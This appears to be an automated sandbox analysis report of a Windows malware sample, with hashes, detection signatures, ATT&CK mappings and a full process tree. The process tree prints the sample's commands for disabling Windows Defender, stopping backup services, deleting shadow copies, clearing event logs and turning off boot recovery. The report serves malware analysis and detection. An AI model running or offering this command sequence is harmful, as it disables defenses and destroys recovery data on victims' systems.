Analysis

  • max time kernel
    47s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22-11-2021 11:29

General

  • Target

    56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe

  • Size

    3.5MB

  • MD5

    d63d3afed4c1975a7e31906e0e163305

  • SHA1

    b3f4e45ef92c5ec76bfdaeb3a19071db65ddd7c0

  • SHA256

    56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747

  • SHA512

    3c92f0cb5e63620919d7ab412741396fb0f65558a621c4328a69a33ada732f80d03548d3cd88734cd4bc038a7b7c240ecfe61a1f56ead387f04c700fe7d6c1be

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
    "C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3592
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
          PID:3824
      • C:\Windows\SYSTEM32\net.exe
        net.exe stop "SDRSVC" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3524
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC" /y
          3⤵
            PID:3588
        • C:\Windows\SYSTEM32\net.exe
          net.exe stop "SstpSvc" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SstpSvc" /y
            3⤵
              PID:1152
          • C:\Windows\SYSTEM32\net.exe
            net.exe stop "UI0Detect" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:852
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "UI0Detect" /y
              3⤵
                PID:2452
            • C:\Windows\SYSTEM32\net.exe
              net.exe stop "vmicvss" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:680
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "vmicvss" /y
                3⤵
                  PID:3680
              • C:\Windows\SYSTEM32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1252
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:2772
                • C:\Windows\SYSTEM32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3384
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1492
                  • C:\Windows\SYSTEM32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:608
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:716
                    • C:\Windows\SYSTEM32\net.exe
                      net.exe stop "UnistoreSvc_1515a" /y
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:976
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop "UnistoreSvc_1515a" /y
                        3⤵
                          PID:788
                      • C:\Windows\SYSTEM32\sc.exe
                        sc.exe config "SamSs" start= disabled
                        2⤵
                          PID:3236
                        • C:\Windows\SYSTEM32\sc.exe
                          sc.exe config "SDRSVC" start= disabled
                          2⤵
                            PID:948
                          • C:\Windows\SYSTEM32\sc.exe
                            sc.exe config "SstpSvc" start= disabled
                            2⤵
                              PID:1192
                            • C:\Windows\SYSTEM32\sc.exe
                              sc.exe config "UI0Detect" start= disabled
                              2⤵
                                PID:1388
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "vmicvss" start= disabled
                                2⤵
                                  PID:1428
                                • C:\Windows\SYSTEM32\sc.exe
                                  sc.exe config "VSS" start= disabled
                                  2⤵
                                    PID:1836
                                  • C:\Windows\SYSTEM32\sc.exe
                                    sc.exe config "wbengine" start= disabled
                                    2⤵
                                      PID:1848
                                    • C:\Windows\SYSTEM32\sc.exe
                                      sc.exe config "WebClient" start= disabled
                                      2⤵
                                        PID:1948
                                      • C:\Windows\SYSTEM32\sc.exe
                                        sc.exe config "UnistoreSvc_1515a" start= disabled
                                        2⤵
                                          PID:2240
                                        • C:\Windows\SYSTEM32\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                          2⤵
                                            PID:2896
                                          • C:\Windows\SYSTEM32\reg.exe
                                            reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                            2⤵
                                              PID:3096
                                            • C:\Windows\SYSTEM32\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                              2⤵
                                                PID:692
                                              • C:\Windows\SYSTEM32\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:2220
                                                • C:\Windows\SYSTEM32\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:2116
                                                  • C:\Windows\SYSTEM32\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:3908
                                                    • C:\Windows\SYSTEM32\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:1452
                                                      • C:\Windows\SYSTEM32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:2172
                                                        • C:\Windows\SYSTEM32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:3776
                                                          • C:\Windows\SYSTEM32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:3976
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:3988
                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:3528
                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:60
                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:1084
                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                      2⤵
                                                                        PID:2000
                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                        2⤵
                                                                          PID:644
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                          2⤵
                                                                            PID:2784
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                            2⤵
                                                                              PID:676
                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                              2⤵
                                                                                PID:400
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                2⤵
                                                                                  PID:2708
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                  2⤵
                                                                                    PID:1200
                                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                    2⤵
                                                                                      PID:1332
                                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                                      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                      2⤵
                                                                                        PID:1132
                                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                                        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                        2⤵
                                                                                          PID:1408
                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                          reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                            PID:2252
                                                                                          • C:\Windows\SYSTEM32\reg.exe
                                                                                            reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                            2⤵
                                                                                              PID:1968
                                                                                            • C:\Windows\SYSTEM32\reg.exe
                                                                                              reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                              2⤵
                                                                                                PID:4080
                                                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                                                reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                2⤵
                                                                                                  PID:2840
                                                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                    PID:3860
                                                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                      PID:1208
                                                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                      2⤵
                                                                                                        PID:3728
                                                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                        2⤵
                                                                                                          PID:2128
                                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                          2⤵
                                                                                                            PID:2176
                                                                                                          • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                            vssadmin.exe delete shadows /all /quiet
                                                                                                            2⤵
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:1324
                                                                                                          • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                            wevtutil.exe cl system
                                                                                                            2⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3688
                                                                                                          • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                            wevtutil.exe cl security
                                                                                                            2⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:820
                                                                                                          • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                            wevtutil.exe cl application
                                                                                                            2⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1288
                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                                                            2⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:916
                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                            wmic.exe shadowcopy delete
                                                                                                            2⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:660
                                                                                                          • C:\Windows\SYSTEM32\bcdedit.exe
                                                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                            2⤵
                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                            PID:836
                                                                                                          • C:\Windows\SYSTEM32\bcdedit.exe
                                                                                                            bcdedit.exe /set {default} recoveryenabled no
                                                                                                            2⤵
                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                            PID:960
                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                            2⤵
                                                                                                              PID:1424
                                                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                3⤵
                                                                                                                • Deletes Windows Defender Definitions
                                                                                                                PID:4040
                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                              2⤵
                                                                                                                PID:1916
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                                  3⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2208
                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                2⤵
                                                                                                                  PID:696
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                    3⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:1584

                                                                                                              Network

                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                              Execution

                                                                                                              Command-Line Interface

                                                                                                              1
                                                                                                              T1059

                                                                                                              Persistence

                                                                                                              Modify Existing Service

                                                                                                              1
                                                                                                              T1031

                                                                                                              Defense Evasion

                                                                                                              Impair Defenses

                                                                                                              1
                                                                                                              T1562

                                                                                                              Modify Registry

                                                                                                              1
                                                                                                              T1112

                                                                                                              Disabling Security Tools

                                                                                                              1
                                                                                                              T1089

                                                                                                              Indicator Removal on Host

                                                                                                              1
                                                                                                              T1070

                                                                                                              File Deletion

                                                                                                              2
                                                                                                              T1107

                                                                                                              Credential Access

                                                                                                              Credentials in Files

                                                                                                              1
                                                                                                              T1081

                                                                                                              Collection

                                                                                                              Data from Local System

                                                                                                              1
                                                                                                              T1005

                                                                                                              Impact

                                                                                                              Inhibit System Recovery

                                                                                                              3
                                                                                                              T1490

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                MD5

                                                                                                                8592ba100a78835a6b94d5949e13dfc1

                                                                                                                SHA1

                                                                                                                63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                SHA256

                                                                                                                fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                SHA512

                                                                                                                87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                MD5

                                                                                                                c57ec04f1134fab4786810b1d776d202

                                                                                                                SHA1

                                                                                                                53f4389c35f8f6cd8c61742d2493aa63126259cc

                                                                                                                SHA256

                                                                                                                c160bb93d9464a042de9c79d4b6ab7be980575fd22cbae718f1297d0dee69abe

                                                                                                                SHA512

                                                                                                                c748cc385db95c21ff73f85f300ea36a56d71e95b60af3d49bd4ff15c82376e893a47a910836df329180ed80f91c1223669bfe87acefa2d02b73b2cedb6612b4

                                                                                                              • memory/60-157-0x0000000000000000-mapping.dmp
                                                                                                              • memory/400-163-0x0000000000000000-mapping.dmp
                                                                                                              • memory/520-122-0x0000000000000000-mapping.dmp
                                                                                                              • memory/608-132-0x0000000000000000-mapping.dmp
                                                                                                              • memory/644-160-0x0000000000000000-mapping.dmp
                                                                                                              • memory/676-162-0x0000000000000000-mapping.dmp
                                                                                                              • memory/680-126-0x0000000000000000-mapping.dmp
                                                                                                              • memory/692-147-0x0000000000000000-mapping.dmp
                                                                                                              • memory/716-133-0x0000000000000000-mapping.dmp
                                                                                                              • memory/788-135-0x0000000000000000-mapping.dmp
                                                                                                              • memory/820-180-0x0000000000000000-mapping.dmp
                                                                                                              • memory/852-124-0x0000000000000000-mapping.dmp
                                                                                                              • memory/948-137-0x0000000000000000-mapping.dmp
                                                                                                              • memory/976-134-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1084-158-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1132-167-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1152-123-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1192-138-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1200-165-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1208-174-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1252-128-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1288-181-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1324-178-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1332-166-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1388-139-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1408-168-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1428-140-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1452-151-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1492-131-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1584-228-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-238-0x000001DDCC200000-0x000001DDCC202000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-224-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-225-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-261-0x000001DDCC208000-0x000001DDCC209000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1584-221-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-222-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-229-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-230-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-232-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-223-0x000001DDCA800000-0x000001DDCA802000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-243-0x000001DDCC206000-0x000001DDCC208000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1584-240-0x000001DDCC203000-0x000001DDCC205000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1836-141-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1848-142-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1948-143-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1968-170-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2000-159-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2116-149-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2128-176-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2172-152-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2176-177-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2208-188-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-192-0x000001B751000000-0x000001B751001000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2208-237-0x000001B74EF28000-0x000001B74EF29000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2208-219-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-218-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-197-0x000001B74EF26000-0x000001B74EF28000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-195-0x000001B74EF20000-0x000001B74EF22000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-196-0x000001B74EF23000-0x000001B74EF25000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-193-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-190-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-191-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-182-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-183-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-184-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-185-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-186-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2208-187-0x000001B7368C0000-0x000001B7368C1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/2208-189-0x000001B734D50000-0x000001B734D52000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2220-148-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2240-144-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2252-169-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2452-125-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2708-164-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2772-129-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2784-161-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2840-172-0x0000000000000000-mapping.dmp
                                                                                                              • memory/2896-145-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3096-146-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3236-136-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3384-130-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3524-120-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3528-156-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3588-121-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3592-118-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3680-127-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3688-179-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3728-175-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3776-153-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3824-119-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3860-173-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3908-150-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3976-154-0x0000000000000000-mapping.dmp
                                                                                                              • memory/3988-155-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4080-171-0x0000000000000000-mapping.dmp